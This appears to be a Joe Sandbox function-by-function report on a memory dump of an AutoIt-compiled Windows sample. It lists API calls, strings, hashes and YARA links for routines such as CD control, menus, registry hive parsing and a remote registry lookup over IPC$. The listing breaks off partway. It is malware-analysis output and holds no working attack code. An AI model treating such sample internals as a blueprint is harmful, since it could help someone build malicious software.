Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: P[
API String ID: 641708696-2517523118
Opcode ID: c6cf30df4f8b09d4b93600dc29dce7783c159bb4402b553ec1c07cffb33b8b14
Instruction ID: 9c98169db538ee08d2290b0dd823244cbdf5ede0ce37d0f3a4d0d59a7ab36df2
Opcode Fuzzy Hash: c6cf30df4f8b09d4b93600dc29dce7783c159bb4402b553ec1c07cffb33b8b14
Instruction Fuzzy Hash: 23616E31101B11DFDB3AEF18D958B26BBF3FF50312F14A52BE5528AAA0C771A891DB50

Function 0063A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

CharLowerBuffW.USER32(?,?), ref: 0063A3CB
GetDriveTypeW.KERNEL32 ref: 0063A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0063A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0063A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0063A4C5

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

Strings

wait, xrefs: 0063A482
type cdaudio alias cd wait, xrefs: 0063A443
open, xrefs: 0063A3F2
closed, xrefs: 0063A3DF, 0063A3E8
open , xrefs: 0063A427
close cd wait, xrefs: 0063A4B0
set cd door , xrefs: 0063A466
close, xrefs: 0063A3D1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 0e47ef1242923e63679bf34959bbc05e4ef185edf0ff12298e11674fd9996692
Instruction ID: b20a0646003e5fce5519d8102d621ad0ab08c1e8f718c60b45dae2244ebaf93f
Opcode Fuzzy Hash: 0e47ef1242923e63679bf34959bbc05e4ef185edf0ff12298e11674fd9996692
Instruction Fuzzy Hash: 34516F711043059FC710EF24C99586ABBE5FF88718F40496EF885973A2EB31ED09CB82

Function 0062F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0060E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0062F8DF
LoadStringW.USER32(00000000,?,0060E029,00000001), ref: 0062F8E8

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0060E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0062F90A
LoadStringW.USER32(00000000,?,0060E029,00000001), ref: 0062F90D
__swprintf.LIBCMT ref: 0062F95D
__swprintf.LIBCMT ref: 0062F96E
_wprintf.LIBCMT ref: 0062FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0062FA2E

Strings

Line %d:, xrefs: 0062F968
^ ERROR, xrefs: 0062F9C3
Line %d (File "%s"):, xrefs: 0062F957
Error: , xrefs: 0062F9E5
%s (%d) : ==> %s: %s %s, xrefs: 0062FA12

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 921cc7001f5c6aaf13fc9120c1ff94682f507bed99aebc7a6c7c9c4adb039e0b
Instruction ID: 671a2972590946776f17be4d99a706c4f07b97533d6f0e8c6bf8bdce1bb4a507
Opcode Fuzzy Hash: 921cc7001f5c6aaf13fc9120c1ff94682f507bed99aebc7a6c7c9c4adb039e0b
Instruction Fuzzy Hash: 0541407280061EAACF14FBE4DD5ADEE7B79BF58300F500067B505B61A1EA315F49CB60

Function 005D21A5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

GetSysColor.USER32(0000000F), ref: 005D21D3

Strings

P[, xrefs: 005D21ED

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ColorLongWindow
String ID: P[
API String ID: 259745315-2517523118
Opcode ID: 03f97d7223c1a847bd3ac153688801d4fb0e8fa4b72a3551c63e78ab67a77e5d
Instruction ID: fdc04bb22a06730627d06c3a05b172bc17fc4ed11267c958649bf7b5c544adb6
Opcode Fuzzy Hash: 03f97d7223c1a847bd3ac153688801d4fb0e8fa4b72a3551c63e78ab67a77e5d
Instruction Fuzzy Hash: D6418F350046409BDB359F2CEC88BB93B66FB26331F149267FE658A2E5D7318C42DB21

Function 0065BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00659207,?,?), ref: 0065BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BA85
GlobalLock.KERNEL32(00000000), ref: 0065BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0065BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00659207,?,?,00000000,?), ref: 0065BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00662CAC,?), ref: 0065BAD7
GlobalFree.KERNEL32(00000000), ref: 0065BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0065BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0065BB36
DeleteObject.GDI32(00000000), ref: 0065BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0065BB74

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 87a873d3aafd19d4f3356e81f0a0c33442f4fb0d92dd22af3197bc594bf59ead
Instruction ID: db50a065247e679ca5a796ea2516a58a45f7238f57ff48aae60df971526e17d5
Opcode Fuzzy Hash: 87a873d3aafd19d4f3356e81f0a0c33442f4fb0d92dd22af3197bc594bf59ead
Instruction Fuzzy Hash: 86411875600209EFDB11DFA5DC88EABBBBAFB89712F105068F905D7260DB709E05CB60

Function 0063D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0063DA10
_wcscat.LIBCMT ref: 0063DA28
_wcscat.LIBCMT ref: 0063DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0063DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0063DA63
GetFileAttributesW.KERNEL32(?), ref: 0063DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0063DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0063DAA7

Strings

*.*, xrefs: 0063DAE6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 6102dbc3514ed5c7a75478f8167e20d994d4dcef1dae997e71b85d1516ee67aa
Instruction ID: 08d4c7d5ecd100ca12797a35b4d4b2911f50e635f6a22d2ca56d81384300d0a9
Opcode Fuzzy Hash: 6102dbc3514ed5c7a75478f8167e20d994d4dcef1dae997e71b85d1516ee67aa
Instruction Fuzzy Hash: 438193B15043459FCB24EF68D844AAAB7EABF89714F14482EF889C7391E730DD45CB92

Function 00656F23 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00656FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00656FA8
GetWindowLongW.USER32(?,000000F0), ref: 00656FCC
_memset.LIBCMT ref: 00656FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00656FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00657067

Strings

P[, xrefs: 00656F6F, 00656F7E, 00656FB4, 00657006, 0065712F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID: P[
API String ID: 830647256-2517523118
Opcode ID: 3d9da21660bf221653b6f5dc2615420fa67b61609965e98cb890455b8325f8fd
Instruction ID: c4ad83029f14fe58cdc6d27ce653eafb5437d96022f58e347499d0dfd6d469e4
Opcode Fuzzy Hash: 3d9da21660bf221653b6f5dc2615420fa67b61609965e98cb890455b8325f8fd
Instruction Fuzzy Hash: F4619C71900208AFDB21DFA4DD81EEE77FAEB09700F14015AFA15AB3A1C771AE45DB90

Function 0064731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0064738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0064739B
CreateCompatibleDC.GDI32(?), ref: 006473A7
SelectObject.GDI32(00000000,?), ref: 006473B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00647408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00647444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00647468
SelectObject.GDI32(00000006,?), ref: 00647470
DeleteObject.GDI32(?), ref: 00647479
DeleteDC.GDI32(00000006), ref: 00647480
ReleaseDC.USER32(00000000,?), ref: 0064748B

Strings

(, xrefs: 00647410

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 2ceb1b4e70d34e7e79b2da4c88bab487195a537afe869d8bcf098c59755ee98f
Instruction ID: 452093d4cdaad310b17ec21b00c1146930a9fbb521e3cd12e31e50fa9c6e3076
Opcode Fuzzy Hash: 2ceb1b4e70d34e7e79b2da4c88bab487195a537afe869d8bcf098c59755ee98f
Instruction Fuzzy Hash: C1513775904309EFCB15CFA8CC85EAEBBBAEF48310F14842DFA5A97251D771A9418B60

Function 00650E1A Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0064FDAD,?,?), ref: 00650E31

Strings

HKLM, xrefs: 00650EAF
HKEY_LOCAL_MACHINE, xrefs: 00650E9A
xq, xrefs: 00650E89
HKEY_CURRENT_USER, xrefs: 00650F10
HKEY_USERS, xrefs: 00650F32
HKCU, xrefs: 00650F21
HKCC, xrefs: 00650EFF
HKEY_CLASSES_ROOT, xrefs: 00650EC4
HKU, xrefs: 00650F43
HKEY_CURRENT_CONFIG, xrefs: 00650EEE
HKCR, xrefs: 00650ED9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$xq
API String ID: 3964851224-3202677275
Opcode ID: 952e3b532ce5473a64e302980cff4dbb63ef6b2af21b35700f50018eb965f426
Instruction ID: 34184f4cb2f1c4713a64aa2c0facfdbc89e3a235ba86d297b2f2ce5141c2f75d
Opcode Fuzzy Hash: 952e3b532ce5473a64e302980cff4dbb63ef6b2af21b35700f50018eb965f426
Instruction Fuzzy Hash: 99416A3110024A8BEF20EF15D96AAFE3BA6BF55305F184455FC951B392DB34DD1ACBA0

Function 005D6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 005F0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005D6B0C,?,00008000), ref: 005F0973

Part of subcall function 005D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D4743,?,?,005D37AE,?), ref: 005D4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005D6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 005D6CFA

Part of subcall function 005D586D: _wcscpy.LIBCMT ref: 005D58A5

Part of subcall function 005F363D: _iswctype.LIBCMT ref: 005F3645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 0060E421
EA06, xrefs: 0060E452
Error opening the file, xrefs: 0060E43D, 0060E4B8
Bad directive syntax error, xrefs: 0060E79D
Unterminated string, xrefs: 0060E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 0060E496
AU3!, xrefs: 005D6B61

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fc07d9c6ce100fcc0b7cc9f3918b5d10f2438fde6dd88e9a669eb9dedb2c473c
Instruction ID: fb950898265d1b14c118b4dceed6e5de9baf7f931b5dc5afca3f23bd3fe07aba
Opcode Fuzzy Hash: fc07d9c6ce100fcc0b7cc9f3918b5d10f2438fde6dd88e9a669eb9dedb2c473c
Instruction Fuzzy Hash: 8A027A301083429FC724EF28D8959AFBBE6BFD8314F14491EF495972A2EB31D949CB52

Function 00632D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00632D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00632DDD
GetMenuItemCount.USER32(00695890), ref: 00632E66
DeleteMenu.USER32(00695890,00000005,00000000,000000F5,?,?), ref: 00632EF6
DeleteMenu.USER32(00695890,00000004,00000000), ref: 00632EFE
DeleteMenu.USER32(00695890,00000006,00000000), ref: 00632F06
DeleteMenu.USER32(00695890,00000003,00000000), ref: 00632F0E
GetMenuItemCount.USER32(00695890), ref: 00632F16
SetMenuItemInfoW.USER32(00695890,00000004,00000000,00000030), ref: 00632F4C
GetCursorPos.USER32(?), ref: 00632F56
SetForegroundWindow.USER32(00000000), ref: 00632F5F
TrackPopupMenuEx.USER32(00695890,00000000,?,00000000,00000000,00000000), ref: 00632F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00632F7E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 6615474388c5b0b9c4aeb0f2dae5c49249a80e2287ceb19e5c6e396023df4b65
Instruction ID: a31ceada3240edda40a534b8d3c5b77177bd101c220f9a686bc3d3de88a7211a
Opcode Fuzzy Hash: 6615474388c5b0b9c4aeb0f2dae5c49249a80e2287ceb19e5c6e396023df4b65
Instruction Fuzzy Hash: 4671D370640207BAEB219F54DC6AFEABF66FF04724F10421AF625AA2E1C7716C50DBD4

Function 006488AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006488D7
CoInitialize.OLE32(00000000), ref: 00648904
CoUninitialize.OLE32 ref: 0064890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00648A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00648B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00662C0C), ref: 00648B6F
CoGetObject.OLE32(?,00000000,00662C0C,?), ref: 00648B92
SetErrorMode.KERNEL32(00000000), ref: 00648BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00648C25
VariantClear.OLEAUT32(?), ref: 00648C35

Strings

,,f, xrefs: 006488C1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,f
API String ID: 2395222682-1408682325
Opcode ID: 96cd92438012de02154f642dd9010985d5b748f5b1995b8f87db31bd427e24b8
Instruction ID: 4f37b61a1e62c47c7cd99f7d721a82999a4a739d7d85ca4db147a317dfac21dd
Opcode Fuzzy Hash: 96cd92438012de02154f642dd9010985d5b748f5b1995b8f87db31bd427e24b8
Instruction Fuzzy Hash: 99C126B1608305AFC700DF68C88496BBBEAFF89348F00495DF9899B251DB71ED06CB52

Function 006277DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

_memset.LIBCMT ref: 0062786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006278A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006278BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006278D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00627902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0062792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00627935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0062793A

Strings

SOFTWARE\Classes\, xrefs: 0062780C
\CLSID, xrefs: 00627822
\IPC$, xrefs: 00627882

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: f6800d4aad8e30318c5037dbee42e0fc55d6ca19107170d36644f58822a3c880
Instruction ID: 0c6c547bd6e958ff6d0d51faccfca395dcfd25910d346d59a5ea1b280668bb31
Opcode Fuzzy Hash: f6800d4aad8e30318c5037dbee42e0fc55d6ca19107170d36644f58822a3c880
Instruction Fuzzy Hash: C7410D71C1462DAACF21EB98EC59DEDBB79FF48310F04416AF905A3261EB319D44CB90

Function 00657152 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065716A
CreateMenu.USER32 ref: 00657185
SetMenu.USER32(?,00000000), ref: 00657194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00657221
IsMenu.USER32(?), ref: 00657237
CreatePopupMenu.USER32 ref: 00657241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0065726E
DrawMenuBar.USER32 ref: 00657276

Strings

0, xrefs: 00657160
P[, xrefs: 006571E0, 006571FD
F, xrefs: 00657262

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F$P[
API String ID: 176399719-1590563328
Opcode ID: 4ea4d81931643585668dfabc38a83ecd73ec4425acb5fa4332e30ad2d598e98f
Instruction ID: 89bf06af62e5c62ae586ab4409b08557541245a5525740eb5f61057a6876d6bb
Opcode Fuzzy Hash: 4ea4d81931643585668dfabc38a83ecd73ec4425acb5fa4332e30ad2d598e98f
Instruction Fuzzy Hash: 3F413774A01305EFDB20DF64E944E9A7BBAFF48351F144029FD4597361D731AA14CB90

Function 0062F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0060E2A0,00000010,?,Bad directive syntax error,0065F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0062F7C2
LoadStringW.USER32(00000000,?,0060E2A0,00000010), ref: 0062F7C9

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

_wprintf.LIBCMT ref: 0062F7FC
__swprintf.LIBCMT ref: 0062F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0062F88D

Strings

